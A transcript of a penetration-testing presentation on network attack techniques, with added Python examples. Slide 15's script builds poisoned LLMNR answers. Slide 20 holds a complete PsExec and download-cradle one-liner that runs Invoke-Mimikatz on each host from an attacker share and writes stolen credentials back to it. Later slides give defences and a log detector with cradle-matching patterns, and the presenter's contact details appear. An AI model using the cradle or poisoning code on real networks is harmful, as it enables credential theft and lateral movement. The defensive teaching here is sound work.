
Common Network Penetration Testing Techniques

Common Network Penetration Testing Techniques. Russel Van Tuyl. Russel Van Tuyl Security Analyst TN Air National Guard SANS MSISE Student Father of 2, Husband to 1 Russel.VanTuyl@gmail.com.


Presentation Transcript


  1. Common Network Penetration Testing Techniques Russel Van Tuyl

  2. Russel Van Tuyl • Security Analyst • TN Air National Guard • SANS MSISE Student • Father of 2, Husband to 1 • Russel.VanTuyl@gmail.com • Russel C. Van Tuyl | Security Analyst | Sword & Shield Enterprise Security | 1431 Centerpoint Blvd., Suite 150 | Knoxville, TN 37932 | P: 865-244-3568 | M: 865-214-0579 | rcvt@sses.net

  3. This is how I hack!

  4. Hack All The Things • External Network • (Web) Apps • Internal Network • Social Engineering • Wireless • Physical

  5. Methodology • Recon/Intel Gathering • Vulnerability Identification/Analysis • Exploitation • Post Exploitation • Reporting (boo)

  6. Phishing

  7. Social Engineering - Pretext

  8. External Assessment

  9. Internal Assessment

  10. How I see networks

  11. Broadcast Messages • Go to every host on the subnet • Typically in search of a resource (like name resolution) • Common Windows Broadcast Protocols • NetBIOS Name Service (NBNS) • RFC 1001 & 1002 • UDP 137 to the subnet broadcast address • LLMNR • RFC 4795 • UDP 5355 to 224.0.0.252 (link-scope multicast; FF02::1:3 on IPv6) • Windows only falls back to these after DNS fails, so every name that does not exist in DNS (a typo, a stale share, WPAD) is asked of the whole segment, and nothing in either protocol authenticates the answer • Types of names looked up • Windows Redirector • File Server • Print Server • WPAD

  12. NetBIOS Name Service (NBNS) Broadcast Messages

  13. Link-Local Multicast Name Resolution (LLMNR) Multicast Messages

  14. Web Proxy Autodiscovery Protocol (WPAD) • Standard • Internet Engineering Task Force (IETF) draft • http://tools.ietf.org/html/draft-ietf-wrec-wpad-01 • Expired December 1999 (never became an RFC, but Windows and most browsers still implement it) • Discovery • DHCP (option 252) • DNS (wpad.<domain suffix>; when DNS has no answer Windows falls back to LLMNR/NBNS for the name "wpad", which is exactly what a poisoner waits for) • Proxy Auto-Config (PAC) • wpad.dat, a JavaScript file whose FindProxyForURL() tells the browser which proxy to use for each URL, so whoever answers the WPAD lookup chooses where the victim's web traffic goes • http://findproxyforurl.com

  15. Responder by Laurent Gaffie • @pythonresponder • Trustwave SpiderLabs • https://github.com/SpiderLabs/Responder
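Added example for slides 11 through 15; this is not code from the slides and not Responder's code. It is a minimal LLMNR codec plus the NBNS name encoding, used to replay the exchange a poisoner abuses: victim multicasts a query, attacker answers first, victim takes the answer. The resolver in victim_accepts() checks only what a real resolver checks (response bit, transaction id, name). The transaction id 0x1234, the name "wpad" and the attacker address 10.0.0.66 are constructed values.

```python
"""LLMNR query/response codec plus NBNS name encoding, to show why the
broadcast/multicast lookups on these slides are trivially poisoned.

Added example for this page; it is not Responder's code. The victim name,
attacker address and transaction id in the demo are constructed values.
"""
import struct

LLMNR_GROUP = ("224.0.0.252", 5355)  # RFC 4795: IPv4 link-scope multicast, UDP 5355
NBNS_PORT = 137                       # RFC 1002 name service, sent to the subnet broadcast


def encode_name(name: str) -> bytes:
    """DNS-style labels (length byte + label ... 0x00), which is what LLMNR uses."""
    labels = name.strip(".").split(".")
    return b"".join(bytes([len(lab)]) + lab.encode("ascii") for lab in labels) + b"\x00"


def decode_name(buf: bytes, off: int):
    labels = []
    while buf[off]:
        n = buf[off]
        labels.append(buf[off + 1:off + 1 + n].decode("ascii"))
        off += 1 + n
    return ".".join(labels), off + 1


def llmnr_query(txid: int, name: str) -> bytes:
    """Header = ID, flags, QDCOUNT, ANCOUNT, NSCOUNT, ARCOUNT; one question, type A, class IN."""
    return struct.pack("!6H", txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack("!HH", 1, 1)


def parse_llmnr(pkt: bytes) -> dict:
    txid, flags, _qd, an, _ns, _ar = struct.unpack("!6H", pkt[:12])
    name, off = decode_name(pkt, 12)
    qtype, _qclass = struct.unpack("!HH", pkt[off:off + 4])
    off += 4
    answers = []
    for _ in range(an):
        _aname, off = decode_name(pkt, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        rdata, off = pkt[off:off + rdlen], off + rdlen
        if rtype == 1 and rdlen == 4:
            answers.append(".".join(str(b) for b in rdata))
    return {"txid": txid, "response": bool(flags & 0x8000), "name": name,
            "qtype": qtype, "answers": answers}


def llmnr_poison(query: bytes, attacker_ip: str, ttl: int = 30) -> bytes:
    """What a poisoner sends: QR=1, the victim's txid and question echoed back,
    and an A record pointing at the attacker. Nothing in the protocol
    authenticates the answer, so the victim cannot tell this from a real one."""
    q = parse_llmnr(query)
    question = encode_name(q["name"]) + struct.pack("!HH", q["qtype"], 1)
    rdata = bytes(int(o) for o in attacker_ip.split("."))
    answer = encode_name(q["name"]) + struct.pack("!HHIH", 1, 1, ttl, len(rdata)) + rdata
    return struct.pack("!6H", q["txid"], 0x8000, 1, 1, 0, 0) + question + answer


def victim_accepts(query: bytes, response: bytes):
    """The resolver's only checks: QR set, txid matches, name matches. First
    answer on the wire wins; returns the address the victim will now connect to."""
    q, r = parse_llmnr(query), parse_llmnr(response)
    if r["response"] and r["txid"] == q["txid"] and r["name"].lower() == q["name"].lower():
        return r["answers"][0] if r["answers"] else None
    return None


# NBNS (RFC 1001 section 14.1) first-level encoding: the 15-char padded name plus
# the service suffix byte is split into nibbles, each written as 'A' + nibble.
def nbns_encode_name(name: str, suffix: int = 0x20) -> bytes:
    raw = name.upper().ljust(15)[:15].encode("ascii") + bytes([suffix])
    enc = b"".join(bytes([(b >> 4) + 0x41, (b & 0x0F) + 0x41]) for b in raw)
    return bytes([len(enc)]) + enc + b"\x00"


def nbns_decode_name(buf: bytes):
    enc = buf[1:1 + buf[0]]
    raw = bytes(((enc[i] - 0x41) << 4) | (enc[i + 1] - 0x41) for i in range(0, len(enc), 2))
    return raw[:15].decode("ascii").rstrip(), raw[15]


if __name__ == "__main__":
    # Demo: a workstation whose DNS lookup for "wpad" failed falls back to LLMNR.
    q = llmnr_query(0x1234, "wpad")
    r = llmnr_poison(q, "10.0.0.66")            # constructed attacker address
    print("victim will use proxy at", victim_accepts(q, r))
    print("NBNS form of the same name:", nbns_encode_name("wpad"))
```

Run it and the victim "resolves" wpad to 10.0.0.66; from there the browser fetches wpad.dat from the attacker, and Responder answers that request with a demand for NTLM authentication, which is how the hashes on the later slides are collected. The NBNS encoder shows why NBNS needs its own handling: the same lookup on UDP 137 carries the name as a 32-character nibble string (FHFAEBEE... for WPAD, with the <20> file-server suffix) rather than as DNS labels.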

  16. runas.exe

  17. Windows PowerShell is an interactive object-oriented command environment with scripting language features that utilizes small programs called cmdlets to simplify configuration, administration, and management of heterogeneous environments in both standalone and networked topologies by utilizing standards-based remoting protocols.

  18. powershell.exe • Built on .NET Framework • Verb-Noun • Tab Complete • Alias • Structured Data/Objects • Syntax Highlighting (version 5) • Released in 2006 on XP*/Vista/Server 2003 • .ps1 • Modules .psm1 • Integrated Scripting Environment (ISE)

  19. Download Cradle

  20. ForEach ($h in Get-Content C:\hosts.txt){C:\PsExec.exe \\$h -d -e -u ACME\bob -p 'P@$$word1' -s cmd /c powershell -nop -command "& {IEX ((new-object net.webclient).downloadstring('\\172.16.1.205\data\Invoke-Mimikatz.ps1'));Invoke-Mimikatz -DumpCreds > \\172.16.1.205\data\%COMPUTERNAME%.txt}"} • One PsExec per host in hosts.txt, run as SYSTEM (-s) without waiting for it to finish (-d) and without loading the profile (-e) • The password must be single-quoted: left bare, PowerShell treats the $$ in it as a variable • On each target, cmd expands %COMPUTERNAME% before powershell starts, so the remote box pulls Invoke-Mimikatz.ps1 straight into memory from the attacker's share and writes its own dump file back to the same share, nothing touches the target's disk

  21. questions?

  22. PowerShell Empire Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

  23. Sensitive Data Image removed for distribution

  24. Strong Passwords • Password Database (a password manager, so nothing is reused between systems) • Local Admin • Disable & Rename the built-in account • Implement LAPS (a unique, regularly rotated local admin password per machine, so one dumped hash does not open every host) https://support.microsoft.com/en-us/kb/3062591 • Credential Theft • Protected LSASS (RunAsPPL, so user-mode tools cannot open LSASS to read credentials out of it) • Privileged Access Workstations (PAWs) • https://technet.microsoft.com/en-us/library/mt634654.aspx • Least Privilege • Logging • PowerShell v5 (Script Block Logging, event ID 4104, records what actually ran, including what a download cradle pulled in) • http://www.malwarearchaeology.com/log-md/ • Monitor & restrict egress (a cradle still has to reach its server)
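Added example, not part of the slides: detection logic for the slide 20 cradle, run over constructed Event ID 4104 records of the kind the PowerShell v5 Script Block Logging on this slide produces. The field names follow the real 4104 EventData (ScriptBlockId, MessageNumber, MessageTotal, ScriptBlockText); the GUIDs, share paths and benign command are made up. Long script blocks are logged in fragments, so the example reassembles a block before matching and reports blocks whose fragments are missing instead of silently scoring half a script.

```python
"""Reassemble PowerShell script block logs (Event ID 4104) and flag download cradles.

Added example, not from the slides or any vendor tool. The 4104 EventData field
names (ScriptBlockId, MessageNumber, MessageTotal, ScriptBlockText) are the real
ones; the records in SAMPLE_EVENTS are constructed, including one block that the
logger split into two fragments and one whose second fragment never arrived.
"""
import re
from collections import defaultdict

# Ordered so hits are reported in a stable order. Case-insensitive by design:
# PowerShell is case-insensitive and attackers mix case to dodge naive matching.
CRADLE_PATTERNS = {
    "iex":        re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "webclient":  re.compile(r"\bnet\.webclient\b", re.I),
    "download":   re.compile(r"download(string|file|data)\s*\(", re.I),
    "webrequest": re.compile(r"\b(iwr|invoke-webrequest|invoke-restmethod)\b", re.I),
    "unc_source": re.compile(r"\\\\\d{1,3}(\.\d{1,3}){3}\\"),
    "mimikatz":   re.compile(r"invoke-mimikatz|dumpcreds|sekurlsa", re.I),
}

SAMPLE_EVENTS = [  # constructed records, shaped like 4104 EventData
    {"EventID": 4104, "ScriptBlockId": "a1a1a1a1-0000-4000-8000-000000000001",
     "MessageNumber": "1", "MessageTotal": "1",
     "ScriptBlockText": r"Get-ChildItem C:\Windows\Temp | Where-Object { $_.Length -gt 1MB }"},
    # The slide 20 cradle, logged as two fragments of one script block.
    {"EventID": 4104, "ScriptBlockId": "b2b2b2b2-0000-4000-8000-000000000002",
     "MessageNumber": "1", "MessageTotal": "2",
     "ScriptBlockText": r"& {IEX ((new-object net.webclient).downloadstring("
                        r"'\\172.16.1.205\data\Invoke-Mimikatz.ps1'));"},
    {"EventID": 4104, "ScriptBlockId": "b2b2b2b2-0000-4000-8000-000000000002",
     "MessageNumber": "2", "MessageTotal": "2",
     "ScriptBlockText": r"Invoke-Mimikatz -DumpCreds > \\172.16.1.205\data\HOST.txt}"},
    # Only the first of two fragments was collected (e.g. dropped in forwarding).
    {"EventID": 4104, "ScriptBlockId": "c3c3c3c3-0000-4000-8000-000000000003",
     "MessageNumber": "1", "MessageTotal": "2",
     "ScriptBlockText": "$wc = New-Object Net.WebClient;"},
    {"EventID": 4103, "Payload": "CommandInvocation(Get-Process)"},  # not a script block
]


def reassemble(events):
    """Join 4104 fragments per ScriptBlockId in MessageNumber order.
    Returns (complete, partial): partial maps id -> fragment numbers seen, so
    an incomplete block is surfaced instead of being scored on half its text."""
    frags, totals = defaultdict(dict), {}
    for ev in events:
        if ev.get("EventID") != 4104:
            continue
        sid = ev["ScriptBlockId"]
        frags[sid][int(ev["MessageNumber"])] = ev["ScriptBlockText"]
        totals[sid] = int(ev["MessageTotal"])
    complete, partial = {}, {}
    for sid, parts in frags.items():
        if len(parts) == totals[sid]:
            complete[sid] = "".join(parts[n] for n in sorted(parts))
        else:
            partial[sid] = sorted(parts)
    return complete, partial


def score_block(text):
    """Names of the indicators present in one reassembled script block."""
    return [name for name, rx in CRADLE_PATTERNS.items() if rx.search(text)]


def find_cradles(events, min_hits=2):
    """Alert on blocks with at least min_hits indicators: a lone IEX or a lone
    Net.WebClient is common in legitimate admin scripts, the combination is not."""
    complete, partial = reassemble(events)
    alerts = {}
    for sid, text in complete.items():
        hits = score_block(text)
        if len(hits) >= min_hits:
            alerts[sid] = hits
    return alerts, partial


if __name__ == "__main__":
    alerts, partial = find_cradles(SAMPLE_EVENTS)
    for sid, hits in alerts.items():
        print(f"ALERT {sid}: {', '.join(hits)}")
    for sid, seen in partial.items():
        print(f"INCOMPLETE {sid}: only fragments {seen} collected")
```

The "powershell -nop -command" launch line from slide 20 never appears in 4104; it is the command line of a new process and belongs to process-creation auditing (Security 4688 with command-line logging, or Sysmon event 1). Script block logging does capture the decoded content of -EncodedCommand and whatever IEX compiles, which is why it catches cradles whose command line looks harmless.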

  25. Center for Internet Security (CIS) Critical Security Controls • https://www.cisecurity.org/critical-controls.cfm
  CSC 1: Inventory of Authorized and Unauthorized Devices
  CSC 2: Inventory of Authorized and Unauthorized Software
  CSC 3: Secure Configurations for Hardware and Software on Mobile Devices, Laptops, Workstations, and Servers
  CSC 4: Continuous Vulnerability Assessment and Remediation
  CSC 5: Controlled Use of Administrative Privileges
  CSC 6: Maintenance, Monitoring, and Analysis of Audit Logs
  CSC 7: Email and Web Browser Protections
  CSC 8: Malware Defenses
  CSC 9: Limitation and Control of Network Ports, Protocols, and Services
  CSC 10: Data Recovery Capability
  CSC 11: Secure Configurations for Network Devices such as Firewalls, Routers, and Switches
  CSC 12: Boundary Defense
  CSC 13: Data Protection
  CSC 14: Controlled Access Based on the Need to Know
  CSC 15: Wireless Access Control
  CSC 16: Account Monitoring and Control
  CSC 17: Security Skills Assessment and Appropriate Training to Fill Gaps
  CSC 18: Application Software Security
  CSC 19: Incident Response and Management
  CSC 20: Penetration Tests and Red Team Exercises

  26. How To Get Owned in 10 Easy Steps • Don't patch anything • Don't harden servers • Use default/weak passwords, in multiple places • Use shared accounts/passwords • Use poorly written applications • Allow unrestricted inbound traffic • Allow unrestricted outbound traffic • Use the highest possible privilege levels • Put everything on the Internet (bcuz YOLO!) • Assume everything is OK

  27. Questions?
